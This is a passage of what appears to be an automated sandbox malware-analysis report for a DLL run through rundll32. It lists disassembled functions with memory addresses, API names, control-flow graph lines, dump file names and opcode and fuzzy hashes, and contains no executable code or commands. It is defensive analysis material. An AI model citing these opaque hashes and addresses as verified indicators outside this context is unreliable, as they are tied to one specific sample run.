                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79E12171408A0D8FE751EF14E895BE6BBF4F768340F20067FE84AC2561DB789246CB86
                                                                                                                                                                                                                                                                      Function 000001FF4CAFB4E0 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 572 1ff4cafb4e0-1ff4cafb4ee 573 1ff4cafb523-1ff4cafb52f 572->573 574 1ff4cafb4f0-1ff4cafb505 572->574 574->573 576 1ff4cafb507-1ff4cafb51d call 1ff4caf4ce0 RtlFreeHeap 574->576 576->573
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                      • Opcode ID: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                                                                                                                                                                                                                      • Instruction ID: ed276b1bcd8c0be45a6a05f00a00274ac9410e2bcf3dcb6a42514b1c9a1f4389
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90F01C30310E098BFB58E7BABCD87B237E2FB9C341B4580A4A406C6194EB789842C711
                                                                                                                                                                                                                                                                      Function 0000000273F414D0 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 579 273f414d0-273f414dc 580 273f414e0-273f414e7 SleepEx 579->580 580->580
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3331451655.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331409929.0000000273F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331451655.0000000273F85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                      • Opcode ID: 490134546b41fa5f3525d4fc16026bee51ec6a607ddd3dfaa8bb0cc5ac4d8099
                                                                                                                                                                                                                                                                      • Instruction ID: 0bf00bace8f2674ea540bcf736f3f2282d979a864102f6c7b7d6f84e33ec7844
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 490134546b41fa5f3525d4fc16026bee51ec6a607ddd3dfaa8bb0cc5ac4d8099
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06B09B14F04594C7E2255791B44D7699610B74FBD1F249451C55D13755851455425702
                                                                                                                                                                                                                                                                      Function 000001FF4B0A11C0 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4B0A0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3332368718.000001FF4B0E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4b0a0000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                      • Opcode ID: a26db5a74adc6119d098d68705d28c1916c0da013186a83d7531f391c9707544
                                                                                                                                                                                                                                                                      • Instruction ID: 8734ce49c56e95ebc2df2b3fd8fe03f30472c91dd89aa18a18fb1262231a6cf2
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a26db5a74adc6119d098d68705d28c1916c0da013186a83d7531f391c9707544
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31D092B6B1468087DB289B25E451A0BBB60F799744F904129EB8D57B68CA3EC6168F04

                                                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                                                      Function 000000018004C510 Relevance: 15.4, APIs: 10, Instructions: 371COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: memcpy_s
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1502251526-0
                                                                                                                                                                                                                                                                      • Opcode ID: d65eaab545a1f0b3e028d40bc848e10c731a40ca7154dd932d5894c03336bdee
                                                                                                                                                                                                                                                                      • Instruction ID: abfc01c1cae31b126f3606ba6e35873ac6e2165b9242cca6e17ef92ae9629bfb
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d65eaab545a1f0b3e028d40bc848e10c731a40ca7154dd932d5894c03336bdee
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4EE1A076204A898BE7B6CF15D488BD937A0F39D7CCF529016EB0947B84DB35CA09CB45
                                                                                                                                                                                                                                                                      Function 000000018004C060 Relevance: 10.7, APIs: 7, Instructions: 249COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: memcpy_s
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1502251526-0
                                                                                                                                                                                                                                                                      • Opcode ID: aae69b84937ae52c50460b3a93fd80386282a716ad85a420871dc6e10509decd
                                                                                                                                                                                                                                                                      • Instruction ID: c11a1434eabf13ff3ffc717c65629f10aad66df5d482a187dde0986ab906fb0d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aae69b84937ae52c50460b3a93fd80386282a716ad85a420871dc6e10509decd
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55A1BDB2200A848BE7FA8F55E590BD977A0F3697CCF41D116EB4A57B84CB34CA48CB05
                                                                                                                                                                                                                                                                      Function 0000000180052534 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLastNameTranslate$CodePageValidValue
                                                                                                                                                                                                                                                                      • String ID: utf8
                                                                                                                                                                                                                                                                      • API String ID: 1791977518-905460609
                                                                                                                                                                                                                                                                      • Opcode ID: a78d7057517b415f687703166ca4a3cfcdca313bed36a1596b117302a90adb15
                                                                                                                                                                                                                                                                      • Instruction ID: 68df83c6e16fb6719a30522dc5a7a3ce8abf960c58eb50addb9b285837f9a530
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a78d7057517b415f687703166ca4a3cfcdca313bed36a1596b117302a90adb15
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF91AB32200B4986EBA69F21D5513E923A5FB8DBC4F54C121FE5867786EF3AC759C700
                                                                                                                                                                                                                                                                      Function 0000000180053038 Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2591520935-0
                                                                                                                                                                                                                                                                      • Opcode ID: 802e43ab5220ed512d0623585b5c6eee699b76c966b13ec90f4942404d9e4e82
                                                                                                                                                                                                                                                                      • Instruction ID: 64d13e85883def1e901923d6c9018b7936bb528f0590fea9e49b5af43c603379
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 802e43ab5220ed512d0623585b5c6eee699b76c966b13ec90f4942404d9e4e82
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20717C72710B0889FBA29B61D8527EC23B4BB4C7C8F44C526BA19677D5EF3A864DC350
                                                                                                                                                                                                                                                                      Function 00000001800402A0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                                                                                                                      • Opcode ID: 1a631cd767aa6af9efa7e5aa469953c2907d5c4779ab4064bd7ad95633586567
                                                                                                                                                                                                                                                                      • Instruction ID: 483f6a83d11dcc029adc45c6f3cb0b9be83de0b0cb0aa062e5b1d14df8a2b4d4
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a631cd767aa6af9efa7e5aa469953c2907d5c4779ab4064bd7ad95633586567
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D319236204F8486EBA1CF25E8443EE73A4F788798F504126FA8D53B99DF39C659CB00
                                                                                                                                                                                                                                                                      Function 0000000180013CD4 Relevance: 58.1, APIs: 4, Strings: 29, Instructions: 382COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                                                                                      • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                                                                                                                                                                                                                                      • API String ID: 2943138195-1482988683
                                                                                                                                                                                                                                                                      • Opcode ID: f5b08725d49e3936faf24a31500805328ba618e891ce830165a6676dc23d0718
                                                                                                                                                                                                                                                                      • Instruction ID: aba4e943f25002773c1e8b8ff256808fc8ff7469cd32bafab8b6d36a2db658ad
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5b08725d49e3936faf24a31500805328ba618e891ce830165a6676dc23d0718
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E024E72A10F18D8FBA6CB68D8953ED27B1B31D7C4F608119EA091AAA8DF74C74DC740
                                                                                                                                                                                                                                                                      Function 00000001800177FC Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+$Replicator::operator[]
                                                                                                                                                                                                                                                                      • String ID: `anonymous namespace'
                                                                                                                                                                                                                                                                      • API String ID: 3863519203-3062148218
                                                                                                                                                                                                                                                                      • Opcode ID: 99c0d059bb14feceadd0ebac364fdec140f15412be5d4b7962f4a11c550691ce
                                                                                                                                                                                                                                                                      • Instruction ID: 780ad3a83c53e58fc5f4bcda82df12fb3de2ceedc09e18eee4d15cf768c518c0
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99c0d059bb14feceadd0ebac364fdec140f15412be5d4b7962f4a11c550691ce
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2E14872604B8899EBA28F64E8803DD77B1F349788F908115FA8D17B96DF38C659C740
                                                                                                                                                                                                                                                                      Function 0000000180018768 Relevance: 21.4, APIs: 6, Strings: 6, Instructions: 359COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: NameName::$Name::operator+swprintf
                                                                                                                                                                                                                                                                      • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                                                                                                                                                                                                                                      • API String ID: 130963256-2441609178
                                                                                                                                                                                                                                                                      • Opcode ID: 1b7cca95e2e488a3e0c80d76d27b89714392a22bae90429b9d429f6739e61c38
                                                                                                                                                                                                                                                                      • Instruction ID: 2de753167b07bd77337a4f86cbd4a1a1ff146968b76736af4f3f81d3ad70022d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b7cca95e2e488a3e0c80d76d27b89714392a22bae90429b9d429f6739e61c38
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0FF1AF72604E1889FBD79BA4C9953FC27A1AF0D7C4F54C116FA0A27A96DF38874DA301
                                                                                                                                                                                                                                                                      Function 0000000180015C48 Relevance: 19.9, APIs: 13, Instructions: 361COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2943138195-0
                                                                                                                                                                                                                                                                      • Opcode ID: d75365040a848f4e962de2583f4bdf6dcab0124c40e345c2fd97b6724785b456
                                                                                                                                                                                                                                                                      • Instruction ID: 59aeec8a3cdcdbcd6b95e25ddd39330fc951fab43e09b50c7be90718a66a7329
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d75365040a848f4e962de2583f4bdf6dcab0124c40e345c2fd97b6724785b456
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CCF13D76B04A889EEB52DFA4E4903EC77B1E30978CF448016FA496BA96DF34C65DC340
                                                                                                                                                                                                                                                                      Function 0000000180013980 Relevance: 16.7, APIs: 11, Instructions: 158COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2943138195-0
                                                                                                                                                                                                                                                                      • Opcode ID: a7deb5bfb90b94af832b3ced5090f2e4193ca0aafd624f38f0026d8047bab8f3
                                                                                                                                                                                                                                                                      • Instruction ID: 318727eee5e13463933b1bdaa130879d0bade3f0a89f414074ac98ea7bab58df
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7deb5bfb90b94af832b3ced5090f2e4193ca0aafd624f38f0026d8047bab8f3
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD711C72710A49AAFB52DFA4D4913DC37B1A7487CCF808515EE4967A99EF30C71AC390
